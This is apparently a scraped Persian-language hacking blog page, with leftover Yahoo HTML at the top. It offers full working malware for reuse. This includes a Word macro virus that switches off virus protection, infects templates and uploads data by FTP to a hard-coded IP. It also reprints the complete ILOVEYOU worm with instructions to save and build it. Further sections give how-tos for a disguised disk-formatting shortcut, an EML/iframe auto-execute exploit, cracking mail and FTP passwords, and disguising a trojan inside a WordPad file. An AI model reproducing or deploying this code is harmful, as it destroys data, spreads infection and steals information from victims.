<CENTER>
<HR width=750 noShade SIZE=1>
<TABLE cellSpacing=0 cellPadding=0 width=750 border=0>
<TBODY>
<TR>
<TD align=middle><FONT face=arial color=#8d8d8d size=-2>Copyright © 2003
Yahoo! Inc. All rights reserved. <A
href="http://docs.yahoo.com/info/copyright/copyright.html">Copyright
Policy</A> <A href="http://docs.yahoo.com/info/terms/" target=_new>Terms
of Service</A><BR><B>NOTICE: We collect personal information on this
site.<BR>To learn more about how we use your information, see our <A
href="http://privacy.yahoo.com/" target=_new>Privacy
Policy</A></B></FONT></TD></TR></TBODY></TABLE></CENTER><!-- text below generated by server. PLEASE REMOVE --></OBJECT></LAYER>
<DIV></DIV></SPAN></STYLE></NOSCRIPT></TABLE></SCRIPT></APPLET>
<SCRIPT language=JavaScript
src="Sign in - Yahoo! Member Directory_files/mc.js"></SCRIPT>
<SCRIPT language=JavaScript src=""></SCRIPT>
<SCRIPT language=javascript>geovisit();</SCRIPT>
<NOSCRIPT><IMG height=1 alt=setstats
src="Sign in - Yahoo! Member Directory_files/visit.gif" width=1
border=0></NOSCRIPT> <IMG height=1 alt=1
src="Sign in - Yahoo! Member Directory_files/serv.gif" width=1> <!-- w45.geo.scd.yahoo.com compressed Tue Aug 19 02:23:22 PDT 2003 --></BODY></HTML

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then

If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If

LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))

For I = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next I
LogFile = "C:\hsf" & LogFile & ".sys"

Open LogFile For Output As #1
Print #1, LogData
Close #1

Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1

Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True

End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then


'Infect the NormalTemplate
If DocumentInfected = True Then

SaveNormalTemplate = NormalTemplate.Saved

OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)


'Write a log file of this NormalTemplate infection
For I = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, I, 1) <> Chr(13) Then
If Mid(Application.UserAddress, I, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, I, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next I

OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)


nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode

If SaveNormalTemplate = True Then NormalTemplate.Save

End If


'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then

SaveDocument = ActiveDocument.Saved

OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode

If SaveDocument = True Then ActiveDocument.Save

End If


End If

End Sub

سلام. برای ساختن ويروس i love you بايد کد های زير را در يک برنامه ويرايش متن مثل نت پد خودتون کپی کنيد و اون رو با نام دلخواه ولی با پسوند vbs. ذخيره کنيد مثلا:

your file name.vbs

اين هم از کد ها:



rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - "&vbcrlf'>LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March "&vbcrlf'>2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
"&vbcrlf'>good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ "&vbcrlf'>BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<script "&vbcrlf'>language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<script "&vbcrlf'>LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــ

حالا به همين راحتی شما يه ويروس ساختين!

ولی مواظب باشيد که روش کليک نکنيد اجرا بشه!

ين ويروس با استفاده از مشکلی که در Header فايلهای EML بود خود را تکثير کرد در زیر ما به برسی اين مشکل خواهيم پرداخت

اگر شما با زبان HTML آشنائی داشته باشيد حتمآ از iframe استفاده کرده ايد اين ويیروس اين با استفاده از این TAG به صورت زير

&tl iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
&tl /iframe >
وبا استفاده از کد زير برای قسمت Attachment فایل EML

Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: &tl EA4DMGBP9p >


خود را تکثير کرد در زِير اين قسمت فايل اجرائی قرار داشته که با نام readme.exe بود اشکال اين بود که فايلهائی که از نوع audio/x-wav با شند به صورت خود کار اجرا می شود تگ IFRAME نِز بدون اينکه سوالی از کاربر بکند فايل را Download کرد و اجرار می کرد بدون اين که ببنيد آيا فايل واقعآ Audio است يا خير .
لازم به ذکر است که اين مشکل در حال حاضر از بین رفته و با استفاده از Patch ويا نصب Service Packet3 می توانيد از اين مشکل رهائی بابيد.

برای نوشتن اينگونه ويروس شما لازم است که يک فايل EML ساخته و فايل ويروس خود را به فايل الحاق کرده و کد اول را در بدنه فايل EML و کد دوم را در قسمتی که نام فايل الحاقی شما وجود دارد باز نويسی کند. خطر کرم جديد از نوع Yaha خطر در کمين است اين ويروس در خاورميانه اشاعه پيدا کرده است . بايد بگوايم که اين يک هديه سال نو مسيحی به کشورهای خاورميانه بود در زیر به تکینیک این ویوس خواهیم پرداخت
اين کرم وقتی به داخل سيستم وارد می شود سه فايل زير را در دايرکتوری نسب ويندوز کپی می کند
tcpsvs32.exe
nav32_loader.exe
WinServices.exe

اين کرم کليدهای زير را در ريجستری می سازد
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"WinServices" = "%WinSysDir%\WinServices.exe"


[HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WinServices" = "%WinSysDir%\WinServices.exe"

این کرم از بین می برد پروسه هائی که دارای نامهای زیر می باشد
ANTIVIR
PVIEW
WEBSCANX
RMVTRJANSAFEWEB
ICMON
CFINET
CFINET32
AVP.EXE
LOCKDOWN2000
AVP32
ZONEALARM
ALERTSVC
AMON.EXE
AVPCC.EXE
AVPM.EXE
ESAFE.EXE
PCCIOMON
PCCMAIN
POP3TRAP
WEBTRAP
AVCONSOL
AVSYNMGR
VSHWIN32
VSSTAT
NAVAPW32
NAVW32
NMAIN
LUALL

این کرم نامهائی با سابجتهای زیر دارد
Sample Screensavers
Project
Free Screensavers 4 U
Patch for Klez.H
Patch for Klez.H

كرمي است كه به آهستگي در ايميل ها پخش مي شود . و به كار افتادن آن از طريق ايميل هايي با غالب HTML صورت مي گيرد.

همين طور براي مخفي كردن خود و براي آناليز عمقي بيشتر داراي چند لايه است . اين كرم ابتدا از آسيا و اروپا رشد پيدا كرد و پخش شد و وجود آن اولين بار در اين مناطق گزارش شد .

جزييات :

Fela در هنگامي كه ميل آلوده باز مي شود فعال مي گردد . در اين نقطه كرم خود را به سايت Spain متصل كرده و بصورت مخفي كدي را كه در JavaScript موجود در سايت وجود دارد دانلود مي كند . اين كد JS اسكريپت ديگري در VBS را اجرا مي كند . اين كد بدنه كرم است كه از طريق VBS تغييراتي در Internet Explorer مي دهد. مثلاً URL هاي كه در آدرس بار Internet Explorer تايپ مي شوند بدون پروتكل مخصوص پيشوندي (HTTP://) حساب مي كند و اين يكي از دستورات اين كرم است كه به سبب آن سيستم دوباره آلوده خواهد شد .

كرم تلاش مي كند تا دكمه هايي با نام هاي Search , AntiVirus , Pills , Security را به اينترنت اكسپلورر كه اضافه كند. اگر هر كدام از اين دكمه ها را فشار دهيد دوباره به كرم آلوده مي شويد .

كرم دو فايل را در شاخه ويندوز كپي مي كند( C**** و C****.HTM ) و به جاي * تاريخ جاري را قرار مي دهد. اولين فايل براي لود از رجيستري ساخته شده است و دومين فايل شامل امضا واقعي است كه توسط خود كرم استفاده مي شود .

virus2004.persianblog.com

وقتي اين ويروس را فعال كنيد . سه اتفاق عجيب و غير عادي رخ مي دهد . اين ويروس در وهله اول يك عدد تصادفي را محاسبه مي كند كه به احتمال 1 به 33 با هر بار راه اندازي سيستم با افزودن متن به يك فايل سيستمي در داخل Recycle Bin (C: recycledsircam.sys) تمام فضاي باقيمانده روي هارد ديسك را پر مي كند .

در مرحله بعدي ويروس تاريخ سيستم را كنترل مي كند و اگر تاريخ شانزدهم اكتبر باشد سيستم عامل ويندوز از يك قالب اروپايي براي تاريخ استفاده مي كند (سال / ماه / روز) آن وقت دوباره يك عدد تصادفي توليد كرده كه به احتمال 1 به 20 دستگاه را وادار به حذف تمام فايلها در هارد ديسك مي كند و بالاخره اين ويروس يك سند تصادفي را از هارد ديسك كاربر استخراج كرده و با اضافه كردن آن به بدنه اين ويروس منتشر شده و هارد ديسك ساير كاربران را آلوده مي كند. اگر سند محرمانه باشد امنيت اطلاعات خصوصي و شخصي نيز به خطر مي افتد .

تريلينگ مي گويد كه مشخصه غير عادي ديگر اين ويروس اين است كه وقتي يك فايل را از هارد ديسك براي ارسال به ساير كاربران منتقل (Upload) مي كند به نام فايل پسوند exe ., bat., cam., link را مي افزايد اگر فايل مورد نظر پسوند link يا .bat داشته باشد ويروس اساساً خود را خنثي مي كند و ديگر نمي تواند به درستي عمل كند . ويروس Sircam خود را در Recycle Bin ويندوز مايكروسافت مخفي مي كند، چرا كه اكثر ويروس ياب ها آن را براي رديابي ويروس اسكن نمي كنند. اين ويروس يك كرم كامپيوتري نيز هست و از طريق دفترچه آدرس Microsoft Outlook كاربر و كپي كردن خود به تمام درايوهاي اشتراكي كه مي يابد منتشر مي شود. نامه الكترونيكي ارسال شده به زبان انگليسي يا به زبان اسپانيايي است و اگر چه متن پيام متفاوت است اما بيشتر به يكي از اشكال زير ظاهر مي شود:

Hi! How are you?

I send you this file in order to have your advice

I hope you can help me with this file that send

I hope you like the file that I send to you

This is the file with the information that you ask for

FPRIVATE "TYPE=PICT;ALT="

See you later. Thanks

آخرين ويروس شناخته شده اي كه از تاريخ خاص براي فعال شدن استفاده كرد ويروس چرنوبيل بود كه روز بيست و ششم آوريل 2000 سالگرد انفجار چرنوبيل در روسيه فعال شد. اين ويروس نيز ماهها قبل از تاريخ فعال شدن (اوت 1999) شيوع يافت و بدين ترتيب قبل از حمله به كاربران فرصت كافي داد تا سيستم خود را از وجود اين ويروس پاكسازي كنند.

اين ويروس قابليت پر كردن فضاي هارد ديسك كاربران را دارد.حذف فايلها و توزيع اسناد خصوصي و همچنين مخفي ماندن از ديد برنامه هاي عادي ويروس ياب در اينترنت از ويژگي هاي ديگر آن است و با استفاده از كتابچه آدرس هاي Microsoft Outlook در اينترنت انتشار مي يابد.

مركز تحقيقات ضد ويروس شركت سيمانتك (SARC) اين ويروس را كه Sircam نام دارد از نظر ايجاد خطر در رده چهارم قرار داده است. گروه واكنش هاي اضطراري ضد ويروس شركت مك آفي ( AVERT) و مركز اطلاعات ويروس ترند مايكرو خطر اين ويروس را متوسط خواندند .Sircam در فهرست ويروس هاي خطرناك مركز جهاني رديابي ويروس ترند ، مقام سوم را به خود اختصاص داده است .

اين ويروس معمولاً به صورت ضميمه نامه الكترونيكي به نام Sircam از راه مي رسد و خطرات آن درجات متفاوتي دارد كه به صورت تصادفي به وقوع مي پيوندند . ممكن است يك كاربر حامل ويروس باشد اما هرگز آلوده نشود .

اين ويروس چيز سختي نيست ولی خيلي خطرناكه.

اول از همه روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد.

يه صفحه باز ميشه در اون بنويسيد: Format C:/Autotest

سپس Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد.

سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد.

خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين.

اگه خواستين بفهمين چي ميشه به جاي Format C:/autotest بنويسيد Format a:/autotest و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خود قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد.

موفق باشيد

مروز ميخواهم ويروس ZeroZone را به شما معرفي كنم.اين ويروس TimeZone ويندوز را صفر ميكند.يعني تايم ويندوز و روز آن صفر ميشود.هيچ ضرري براي كامپيوتر ندارد فقط بايد دوباره زمان و روز ويندوز خود را تنظيم كنيد.و بيشتر براي ترساندن به كار ميرود.

بازهم مثل هميشه Notepad

را باز كنيد وكد زير را در آن تايپ كند.(کد هاي اين

قسمت را با کليدهاي کنترل سي و کنترل وي برداريد در غير اين صورت جواب نمي گيريد)
@Echo offtime=0:0:0
حال آن را با نام Time0.bat سيو كنيد.
بعد دوباره NotePad را باز كرده و كد زير را در آن تايپ كنيد.
@ECHO OFFdate=10-10-10

اين فايل را هم مثل فايل قبلي با نام Date0.bat سيو كنيد.
حال دوباره NotePad را باز كرده و كد زير را در آن تايپ كنيد.
@echo offecho I AM A VIRUSecho SEAT AND SEE MY POWER!!!...pause

و آن را با نام Comment.bat ذخيره كنيد.
يه NotePad باز كرده وكد زير را در آن تايپ كنيد.
START TIME0START DATE0START comment
وآن را با نام Help.bat ذخيره كنيد.
بر روي فايل آخر رايت كليك كرده و Create ShortCut را بزنيد و نام آنرا به Help.txt تغيير دهيد.
سپس با رايت كليك بر روي Help.txt وانتخاب Properties و زدن Change Icon يه آيكون براي فايل خود انتخاب كنيد.
بقيه فايلها را در يك Folder ذخيره كنيد كه شما ميتوانيد آن Folder را نيز Hidden كنيد.
حال ويروس ما آماده است.
موفق باشيد

كرك كردن (Crack) دو مرحله داره :
1 ) پيدا كردن نام كاربر (Username)
2 ) پيدا كردن كلمه عبور (Password)
توي اين متن مي خاهيم ببينيم چطوري مي شه ازسرورهاي FTP و سرور هاي ميل (Mail) كه از پروتوكل هاي SMTP و POP3 پيروي مي كنن براي كرك كردن استفاده كرد .
شايد بپرسين :« اسم كاربر و كلمه عبور ميل كه فقط براي نامه خوندنه ! به چه درد من مي خوره ؟!؟ »
بايد توجه داشته باشين كه در بسياري مواقع سايت ها براي همه سرويس ها كاربر رو فقط با يه اسم كاربر و كلمه عبور مي شناسن . يعني مثلا اگر شما تو سايت jafang.com عضو شدين هم براي خوندن نامه ، هم براي شركت تو مسابقه و قرعه كشي و هم براي شركت در تالار گفتمان از يه اسم كاربر و كلمه عبور استفاده مي كنين. پس اگر من username و password مربوط به ايميل شما رو گير بيارم مي تونم همه جاي سايت از اون استفاده كنم!(معمولا اين جوريه ، نه هميشه)
از اين به بعد هر جا گفتيم « اسم » منظورمون « نام كاربر يا Username » و هر جا گفتيم « رمز » منظورمون همون « كلمه عبور يا Password » هست .
كم و بيش با FTP آشنا هستين. پس از FTP مي گذرم و يه توضيح مختصر در موردSMTP(Simple Mail Transfer Protocol) و POP3 (Post Office Protocol) مي دم :
سرور SMTP يه سروري هست كه معمولا رو پرت (Port) 25 كار مي كنه وبراي فرستادن نامه استفاده مي شه. يعني معمولا وقتي شما با برنامه اي مثل Outlook يه نامه به دوستتون مي فرستين اون برنامه به پرت 25 از يه سرور SMTP وصل مي شه و به سرور مي گه نامه شما رو بفرسته.
سرور POP3 سروري هست كه معمولا رو پرت 110 كار مي كنه و كارش دريافت نامه هست . مثلا اگر شما از سايت mail.jafang.com يه ميل گرفتين و رفتين از تو برنامه اي مثل Outlook ميلتونو چك كنين ، به اون برنامه مي گين كه به پرت 110 از آدرس mail.jafang.com وصل بشه و نامتونو (كه تو اون سايت نگهداري مي شه) بگيره و به شما نشون بده !
مقدمه بسه ديگه ... بريم سر اصل مطلب . (براي اصل مطلب بايد استفاده از Telnet رو بلد باشين)

یه مانع و مشکل خیلی خفنی که داشتم این بود که بابا من این فایل تروجانو با چه اسم و رسمی واسه قربانی سند کنم ؟. چیکار کنم این پسوند exe معلوم نباشه .این ایکون تابلوشو کجام جا کنمو ازین حرفا.. خوتونم دیدید دیگه طرف تا exe رو میبینه 3 بار ویندوزشو غسل و ریستارت میکنه !

.. 1عدد فایل تروجان اماده کنید ...
۲. یه doc file باز کنید . (WordPad)..میتونید رو دسکتاپ راست کلیک کنید به new برید و یه Wordpad document باز کنید
۳.. فایل تروجان رو کپی کنید و توی. wordpad
... paste کنید .میتونید فایل رو با ماوس بکشید و تو صفحه ورد رها کنید
